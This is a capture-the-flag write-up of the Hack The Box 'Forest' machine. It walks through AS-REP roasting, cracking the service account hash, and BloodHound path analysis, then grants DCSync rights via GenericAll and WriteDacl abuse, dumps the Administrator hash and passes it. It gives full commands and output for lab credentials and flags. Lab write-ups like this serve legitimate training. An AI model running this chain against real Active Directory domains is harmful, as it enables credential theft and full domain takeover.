HTB - Forest
Introduction
Forest is an easy active directory based machine that involves ASREPRoasting to a get a hash which we can crack to get our first set of credentials. After gaining some initial credentials, I run a bloodhound ingestor in order to understand what type of AD envrionment I am dealing with. I can also use these credentials to login into the box using WinRM. Using what I learned from bloodhound, I add DCSync privileges to myself and exploit the box to get administrator access.
Enumeration
Port Enumeration
Target IP Address: 10.129.108.125
We run an intial port scan in order to find out what we are dealing with.
1
$ nmap -T4 -F -oA scans/initial 10.129.156.161 -Pn -v
This gives us the following output:
1
2
3
4
5
6
7
8
9
10
11
12
13
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
So, the target machine appears to be an active directory box with the usual services running.
Firstly, I can generate the /etc/hosts file using nxc.
1
2
3
~/htb/boxes/OSCP-PREP/Forest ❯ nxc smb 10.129.8.176 -u '' -p '' --generate-hosts-file scans/hosts
10.129.8.176 FOREST.htb.local htb.local FOREST
Hint
The reason for using nxc to generate the /etc/hosts file is because when I myself write down an entry in /etc/hosts I do not follow the convention. This is also true for most other people. This was mostly popularised by 0xdf and ippsec, and it was very quickly patched by the developers of nxc. For more information, you can refer to these links:
0xdf’s first tweet
0xdf’s second tweet
ippsec’s tweet
nxc pull request
SMB Enumeration
I move onto enumerating SMB by checking for null authentication and guest access.
1
2
3
4
5
6
7
~/htb/boxes/OSCP-PREP/Forest ❯ nxc smb 10.129.8.176 -u '' -p '' --shares
SMB 10.129.8.176 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.8.176 445 FOREST [+] htb.local\:
SMB 10.129.8.176 445 FOREST [-] Error enumerating shares: STATUS_ACCESS_DENIED
~/htb/boxes/OSCP-PREP/Forest ❯ nxc smb 10.129.8.176 -u 'guest' -p '' --shares
SMB 10.129.8.176 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.8.176 445 FOREST [-] htb.local\guest: STATUS_ACCOUNT_DISABLED
I am not surprised that I can’t use them. Moving on, we do manage to learn a few bits of information.
Mainly that the target is running Windows 10 Server 2016 Build 14393 x64
Running enum4linux we also learn a few more important details like the following:
- Domain SID: S-1-5-21-3072663084-364016917-1341370565
- Password history length: 24
- Minimum password length: 7
Kerberos enumeration (User enumeration)
It doesn’t seem like I can find anything more interesting with SMB, so I quickly move onto Kerberos.
We can enumerate usernames using kerbrute’s userenum feature. Kerbrute also has a -o feature to output the content to a log file, so there is really no point in using tee ^_^.
1
2
3
4
5
6
7
8
9
10
11
12
13
~/htb/boxes/OSCP-PREP/Forest 1m 10s ❯ kerbrute userenum --dc FOREST.htb.local -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt | tee scans/kerbrute.out
2025/03/22 17:35:23 > [+] VALID USERNAME: mark@htb.local
2025/03/22 17:35:26 > [+] VALID USERNAME: andy@htb.local
2025/03/22 17:35:55 > [+] VALID USERNAME: forest@htb.local
2025/03/22 17:36:18 > [+] VALID USERNAME: administrator@htb.local
2025/03/22 17:38:27 > [+] VALID USERNAME: sebastien@htb.local
2025/03/22 17:42:11 > [+] VALID USERNAME: santi@htb.local
2025/03/22 17:42:56 > [+] VALID USERNAME: lucinda@htb.local
[duplicates removed]
I do maange to find out a bunch of usernames, but since it’s case-insensitive, I removed the duplicates from the output because that’s just redundant.
Initial Access
Getting some credz
We don’t really have any credentials to speak of, so a kerberoasting attack is off the table currently. Here is what the output would look like if you ran it anyway:
1
2
3
4
~/htb/boxes/OSCP-PREP/Forest ❯ impacket-GetUserSPNs htb.local/ -dc-ip 10.129.8.176
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
No entries found!
What we can check is to see if any user has non-preauth AS_REP. We can do this by using impacket’s handy impacket-GetNPUsers. I assume that NP stands for no preauth.
1
2
3
4
5
6
7
8
9
~/htb/boxes/OSCP-PREP/Forest ❯ impacket-GetNPUsers htb.local/ -request -dc-ip 10.129.8.176
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2025-03-22 17:43:00.972433 2019-09-23 14:09:47.931194 0x410200
$krb5asrep$23$svc-alfresco@HTB.LOCAL:786f2c92f1f3232aca14adb1a4bcefbb$d1ce68f6b73a7b38230f03ba3c479520a7ff84c19dbe3a098068c158edda88be28b71fa1f7adc002dad2e01416cbf795202c6a2fd6c657cede52115e022d7df75a48cc79953498e7823e8ada7772783455b7da11222b13155507b68e0772d9ace3b15cd44a5d0de91c539841a19865c81de2aa6f39c770f120ad84eaea879abe2c0e68cbabcbd3ceb98c4a2bcffe0121b7deb9b8df69307685441e135f82e5a230b535fbc395bda6b62c79746e2bf85ddc8093fc6df2710a5e665a551651e248abd32ff1fbf8b8ceaf414501ddf07d2af0afcef28454772e447ccdbd550e842cae9fc3b2bf65
We do manage to find a hash belonging to svc-alfresco, we can use hashcat to crack it.
Hashcat mode is: 18200
Running the following:
1
hashcat -a 0 -m 18200 ./hash ./rockyou.txt
This eventually cracks to the following password of s3rvice
So the first pair of credentials that we have are:
1
svc-alfresco / s3rvice
Bloodhound analysis
Using the credentials we managed to discover I run a bloodhound-ingestor to gather data.
1
2
~/htb/boxes/OSCP-PREP/Forest ❯ bloodhound-python -d htb.local -u 'svc-alfresco' -p 's3rvice' --zip -c All -ns 10.129.8.176
[...snip...]
Hint
I have since stopped using this particular ingestion agent, because most newer boxes now have the CE (Community Edition) of bloodhound. There is a new version of this particular ingestor by the name of bloodhound-ce-python, but I just use rusthound-ce myself. https://github.com/g0h4n/RustHound-CE
I have found that bloodhound-python might miss some things on this box, so I recommend that you also use rusthound-ce.
Back to the box.
We learn that svc-alfresco is part of the Service Accounts group (this is also denoted by the fact that it has a username prefix of svc) which itself is a member of the Privileged IT Accounts which are then a member of the Remote Management Users and Account Operator groups.
To put it simply:
1
2
3
4
5
svc-alfresco - member of - > Service Accounts (Group) - member of - > Privileged IT Accounts (Group)|- member of -
|
-> Remote Management Users (Group)
|
-> Account Operator (Group)
This means we can use winrm to login into the box.
user.txt
1
2
3
4
5
6
7
8
9
10
11
~/htb/boxes/OSCP-PREP/Forest/bh ❯ evil-winrm -i htb.local -u svc-alfresco -p 's3rvice'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type C:\Users\svc-alfresco\Desktop\user.txt
eb70021e85f5435b71da8989c174be5f
Post-Exploitation
Privilege escalation
Analysing the bloodhound output more carefully we find that account operators has GenericAll permissions on the Exchange Windows Permisions (Group) which then has WriteDacl on -> HTB.LOCAL.
This is a pretty basic AD chain that we can exploit. I will do this in steps
1. Exploiting GenricAll permissions on Exchange Windows Permisions
‘GenricAll permissions’ is a fancy term that basically means that wen can do whatever we want with this AD object. The first things that comes to find is that I can simply add myself to this group. There are multiple ways to do this, but I will use bloodyAD since I like the tool very much and find it useful.
Hint
If you are unfamiliar with I highly recommend getting to know it well. It will help you a lot in attacking AD environments.
Back to the box.
The syntax is pretty easy to understand, so I don’t believe that it requires any explanation.
1
2
~/htb/boxes/OSCP-PREP/Forest ❯ bloodyAD --host FOREST.htb.local -d htb.local -u 'svc-alfresco' -p 's3rvice' add groupMember "Exchange Windows Permissions" svc-alfresco
[+] svc-alfresco added to Exchange Windows Permissions
Moving onto step 2 now.
2. Exploiting WriteDacl on HTB.LOCAL
Now we can abuse the permissions this group has to grant our user DcSync privileges. Once again I am using bloodyAD
1
2
~/htb/boxes/OSCP-PREP/Forest ❯ bloodyAD --host FOREST.htb.local -d htb.local -u 'svc-alfresco' -p 's3rvice' add dcsync svc-alfresco
[+] svc-alfresco is now able to DCSync
We can now abuse this ability to sync domain controllers by tricking the target into thinking we are another DC. This is a geniuine feature used in AD environments that we will abuse for funz. This allows us to get all the credentialz we need using the MS-DRSR protocol.
Now we can use secretsdump to get all the hashes!
1
2
3
4
5
6
7
8
9
10
~/htb/boxes/OSCP-PREP/Forest ❯ impacket-secretsdump 'htb.local'/'svc-alfresco':'s3rvice'@'FOREST.htb.local'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[...snip...]
We can now use evil-winrm to login to the box:
1
2
3
~/htb/boxes/OSCP-PREP/Forest ❯ evil-winrm -i htb.local -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'
*Evil-WinRM* PS C:\Users\Administrator\Documents>type C:\Users\Administrator\Desktop\root.txt
c3fc30f3513fcbdd6703da501b395cb1
That’s the box! I hope you enjoyed it :)